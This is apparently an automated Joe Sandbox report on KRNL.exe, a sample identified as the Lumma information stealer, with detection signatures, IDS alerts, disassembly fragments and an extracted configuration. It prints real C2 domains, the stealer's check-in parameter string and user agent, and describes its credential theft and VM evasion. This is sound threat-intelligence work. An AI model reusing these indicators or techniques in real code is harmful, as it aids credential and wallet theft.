Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KRNL.exe

Overview

General Information

Sample name:KRNL.exe
Analysis ID:1583085
MD5:976a25d2fed5fc7c8700588a33c6826c
SHA1:cce0da8a52a534d6252e716f8476193587e84745
SHA256:a9345000b80b1dd7e5ab5f1491771d39230c83311a1f1b98502f07df453ef02c
Tags:exeuser-Raidr
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • KRNL.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\KRNL.exe" MD5: 976A25D2FED5FC7C8700588A33C6826C)
    • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • KRNL.exe (PID: 2120 cmdline: "C:\Users\user\Desktop\KRNL.exe" MD5: 976A25D2FED5FC7C8700588A33C6826C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "hummskitnj.buzz", "mindhandru.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "scentniej.buzz", "cashfuzysao.buzz"], "Build id": "yau6Na--629912535"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            Process Memory Space: KRNL.exe PID: 2120JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: KRNL.exe PID: 2120JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 3 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                2.2.KRNL.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  2.2.KRNL.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:59.029778+010020283713Unknown Traffic192.168.2.449733104.102.49.254443TCP
                    2025-01-01T21:28:00.167445+010020283713Unknown Traffic192.168.2.449734172.67.157.254443TCP
                    2025-01-01T21:28:01.084272+010020283713Unknown Traffic192.168.2.449735172.67.157.254443TCP
                    2025-01-01T21:28:02.348216+010020283713Unknown Traffic192.168.2.449736172.67.157.254443TCP
                    2025-01-01T21:28:03.506865+010020283713Unknown Traffic192.168.2.449737172.67.157.254443TCP
                    2025-01-01T21:28:04.927121+010020283713Unknown Traffic192.168.2.449738172.67.157.254443TCP
                    2025-01-01T21:28:06.365717+010020283713Unknown Traffic192.168.2.449739172.67.157.254443TCP
                    2025-01-01T21:28:08.097129+010020283713Unknown Traffic192.168.2.449740172.67.157.254443TCP
                    2025-01-01T21:28:13.289406+010020283713Unknown Traffic192.168.2.449741172.67.157.254443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:28:00.594397+010020546531A Network Trojan was detected192.168.2.449734172.67.157.254443TCP
                    2025-01-01T21:28:01.576540+010020546531A Network Trojan was detected192.168.2.449735172.67.157.254443TCP
                    2025-01-01T21:28:13.765451+010020546531A Network Trojan was detected192.168.2.449741172.67.157.254443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:28:00.594397+010020498361A Network Trojan was detected192.168.2.449734172.67.157.254443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:28:01.576540+010020498121A Network Trojan was detected192.168.2.449735172.67.157.254443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.336400+010020585721Domain Observed Used for C2 Detected192.168.2.4654321.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.358476+010020585761Domain Observed Used for C2 Detected192.168.2.4583121.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.370472+010020585781Domain Observed Used for C2 Detected192.168.2.4593521.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.309461+010020585801Domain Observed Used for C2 Detected192.168.2.4569721.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.265380+010020585821Domain Observed Used for C2 Detected192.168.2.4638821.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.277210+010020585841Domain Observed Used for C2 Detected192.168.2.4652211.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.287510+010020585861Domain Observed Used for C2 Detected192.168.2.4593171.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.298392+010020585881Domain Observed Used for C2 Detected192.168.2.4536011.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:58.319723+010020585901Domain Observed Used for C2 Detected192.168.2.4530171.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:28:07.104797+010020480941Malware Command and Control Activity Detected192.168.2.449739172.67.157.254443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-01T21:27:59.548271+010028586661Domain Observed Used for C2 Detected192.168.2.449733104.102.49.254443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://lev-tolstoi.com/kAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/apiulAvira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/pi#Avira URL Cloud: Label: malware
                    Source: https://lev-tolstoi.com/m/SAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "hummskitnj.buzz", "mindhandru.buzz", "prisonyfork.buzz", "screwamusresz.buzz", "appliacnesot.buzz", "inherineau.buzz", "scentniej.buzz", "cashfuzysao.buzz"], "Build id": "yau6Na--629912535"}
                    Multi AV Scanner detection for submitted file
                    Source: KRNL.exeVirustotal: Detection: 40%Perma Link
                    Source: KRNL.exeReversingLabs: Detection: 68%
                    Machine Learning detection for sample
                    Source: KRNL.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: inherineau.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: scentniej.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--629912535
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00414E25 CryptUnprotectData,2_2_00414E25
                    Source: KRNL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49741 version: TLS 1.2
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_00701FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00701FE9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00701F38 FindFirstFileExW,2_2_00701F38
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_00701FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00701FE9
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\.ms-adJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h2_2_0043F040
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 17265850h2_2_004400C0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2]2_2_0043D0D9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then lea eax, dword ptr [esi+00003763h]2_2_0040C08B
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx ebx, word ptr [esi]2_2_0040A8B0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2+12h]2_2_0040C942
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h2_2_0043F150
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0043D9C1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then lea edx, dword ptr [eax-00001099h]2_2_0043B1D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah2_2_0043FB10
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 56ADC53Ah2_2_0043FB10
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2-00002C30h]2_2_0040CC75
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h2_2_004404D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then lea ecx, dword ptr [eax+000071B9h]2_2_00426520
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]2_2_00423675
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax]2_2_00423675
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042B841
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042904E
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]2_2_00424060
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax]2_2_00424060
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then add ecx, edi2_2_0042B00F
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+esi*2]2_2_0043E820
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]2_2_0043E820
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]2_2_0043E820
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]2_2_0043E820
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_004190D1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h2_2_0043B8A0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00422140
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then lea eax, dword ptr [esi+00003763h]2_2_0040C158
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then lea ecx, dword ptr [eax+00000960h]2_2_0041C119
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]2_2_0043E920
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]2_2_0043E920
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]2_2_0043E920
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h2_2_00419930
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]2_2_00419930
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edi, word ptr [esp+eax*2+10h]2_2_00419930
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]2_2_0043E9D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]2_2_0043E9D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]2_2_0043E9D0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h2_2_004291B1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+28h]2_2_00426990
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h2_2_004291B1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]2_2_00429A43
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h2_2_00428A4D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]2_2_0043EA60
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]2_2_0043EA60
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]2_2_0043EA60
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h2_2_00429266
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00420A20
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then lea edi, dword ptr [edx+00001E1Eh]2_2_0040DA8B
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [eax+esi*8], 385488F2h2_2_00425A90
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax*2+4D3B4CBCh]2_2_0040A2A6
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0043DB39
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then lea edx, dword ptr [eax+00000960h]2_2_0041C3F4
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]2_2_00423C40
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax]2_2_00423C40
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2+04h]2_2_0043B450
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2DFE5A91h2_2_0043F450
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then push eax2_2_0043DC5E
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh2_2_00440400
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00407410
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407410
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov dword ptr [edi], 60296828h2_2_00424CCD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [ebx+eax*2]2_2_00424CCD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov dword ptr [esp+04h], ebx2_2_0042B48C
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then lea ecx, dword ptr [eax-000037DBh]2_2_00409570
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042BD77
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then jmp edi2_2_0040A533
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+06h]2_2_004285E1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp word ptr [eax+edi+02h], 0000h2_2_004285E1
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+0000028Ch]2_2_0042D5E6
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+eax*2+40h]2_2_0043CDF0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then add eax, 10h2_2_004195FD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edi, word ptr [ecx]2_2_0041BD8F
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_00408E50
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h2_2_00440650
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00421E60
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00434E60
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+ebp*2+30h]2_2_00429630
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042BE3B
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [ebp+eax*2-00001634h]2_2_00423EC0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax]2_2_00423EC0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [esp+edx*2+14h]2_2_004386C0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042BE86
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h2_2_00415E8C
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042BE9D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h2_2_00415F4C
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx ebp, word ptr [esp+ecx*2-7B41DE5Ah]2_2_00425770
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [esi+ecx*8], E0A81160h2_2_00416777
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h2_2_0043FF00
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then add eax, 10h2_2_004195FD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+esi*2]2_2_0043E710
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx eax, word ptr [esp+edi*2]2_2_0043E710
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+08h]2_2_0043E710
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx esi, word ptr [eax+ecx*2]2_2_0043E710
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_0041B729
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00429F80
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h2_2_0043F780
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 4x nop then movzx ebx, word ptr [esp+edx*2+28h]2_2_004177AD

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.4:53601 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.4:65221 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.4:59317 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.4:65432 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.4:58312 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.4:56972 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.4:59352 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.4:53017 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.4:63882 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49733 -> 104.102.49.254:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49735 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 172.67.157.254:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 172.67.157.254:443
